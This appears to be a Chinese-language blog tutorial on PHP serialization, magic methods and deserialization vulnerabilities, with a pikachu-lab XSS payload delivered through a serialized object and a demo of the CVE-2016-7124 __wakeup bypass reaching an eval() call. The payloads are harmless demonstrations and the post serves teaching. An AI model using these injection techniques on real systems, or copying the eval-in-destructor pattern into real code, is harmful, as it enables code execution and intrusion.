PHP反序列化漏洞知识整理

2020-10-28  本文已影响0人  nohands_noob

0x00 序列化与反序列化

序列化:将对象转化为字符串的形式,称为序列化,在php中可以使用serialize函数实现
反序列化:将字符串还原成对象的形式,称为反序列化,在php中可以使用unserialize函数实现


一个序列化的例子

<?php
class Test{
  public $a = 'ThisA';
  protected $b = 'ThisB';
  private $c = 'ThisC';
  public function test1(){
      echo 'this is test1 ';
  }
}

$test = new Test();

var_dump(serialize($test));

?>
运行结果:
O:4:"Test":3:{s:1:"a";s:5:"ThisA";s:4:"�*�b";s:5:"ThisB";s:7:"�Test�c";s:5:"ThisC";}

O:4:"Test":3的解释:O标识这是一个对象,4表示对象名的长度,“Test”表示对象名,3表示了对象有3个成员

s:1:"a";s:5:"ThisA";的解释:s表示类型为String,为字符串,1表示成员名长度,“a”是这个成员名;s:5:"ThisA",表示值类型为字符串长度为5,值未“ThisA”。

protected属性成员 序列化后名字会以 "%00*%00b"表示,即%00*%00成员名

private属性成员 序列化后会名字会以"%00Test%00c"表示,即%00类名%00成员名

可以看到,对象的方法并不序列化到字符串中。

对于不同类型的序列化字符串保存形式
String : s:size:value;
Integer : i:value;
Boolean : b:value;(保存1或0)
Null : N;
Array : a:size:{key definition;value definition;(repeated per element)}
Object : O:strlen(object name):object name:object size:{s:strlen(property name):property name:property definition;(repeated per property)}


一个反序列化例子:

<?php
class Test{
  public $a = 'ThisA';
  protected $b = 'ThisB';
  private $c = 'ThisC';
  public function test1(){
      echo 'this is test1';
  }
}

$test = new Test();

$str = serialize($test);
//通过反序列化创建对象并执行函数
$test1 = unserialize($str);
$test1->test1();
?>

0x01 魔法函数

__construct()当一个对象创建时被调用
__destruct()当一个对象销毁时被调用
__toString()当一个对象被当作一个字符串使用
__sleep() 在对象在被序列化之前运行
__wakeup将在序列化之后立即被调用

代码例子:

<?php
class Test{
  function __construct(){
      echo 'construct run<br>';
  }

   function __destruct(){
       echo 'destruct run<br>';
   }

   function __toString(){
       return 'toString run<br>';
   }

   function __sleep(){
       echo 'sleep run<br>';
       return array();
   }

   function __wakeup(){
       echo 'wakeup run<br>';
   }
}

$test = new Test();    // __construct run
echo $test;       // __toString run
$str = serialize($test); // __sleep run
$test1 = unserialize($str); // __wakeup run
unset($test);            // __destruct run
?>
执行结果:

0x02 反序列化漏洞

序列化和反序列化本身并没有问题,但结合了魔法函数加上参数可控,就可能造成问题,以pikachu靶场的一个例子:

class S{
   var $test = "pikachu";
   function __construct(){
       echo $this->test;
   }
}

//O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}
$html='';
if(isset($_POST['o'])){
   $s = $_POST['o'];
   if(!@$unser = unserialize($s)){
       $html.="<p>大兄弟,来点劲爆点儿的!</p>";
   }else{
      $html.="<p>{$unser->test}</p>";
   }

}

用户可以传递序列化字符串给服务器进行反序列化,并将对象的test成员输出到页面上,此时的test的值为我们所控

提交payload触发xss:O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}

0x03 CVE-2016-7124(绕过__wakeup函数)

影响版本:PHP5 < 5.6.25
PHP7 < 7.0.10

在反序列化时,如果字符串中对象属性个数大于实际属性个数,wakeup将跳过执行。

<?php
class Test{
   public $test='123456';

   function __wakeup(){
       $this->test = 'echo "wakeup run";';
   }

   function __destruct(){
       @eval($this->test);
   }
}

$str = 'O:4:"Test":1:{s:4:"test";s:10:"phpinfo();";}';

$test1 = unserialize($str);
?>

以上代码的执行结果


当序列化字符串将对象属性个数修改成大于实际数量时,将绕过wakeup的执行,$str = 'O:4:"Test":2:{s:4:"test";s:10:"phpinfo();";}';
上一篇下一篇

猜你喜欢

热点阅读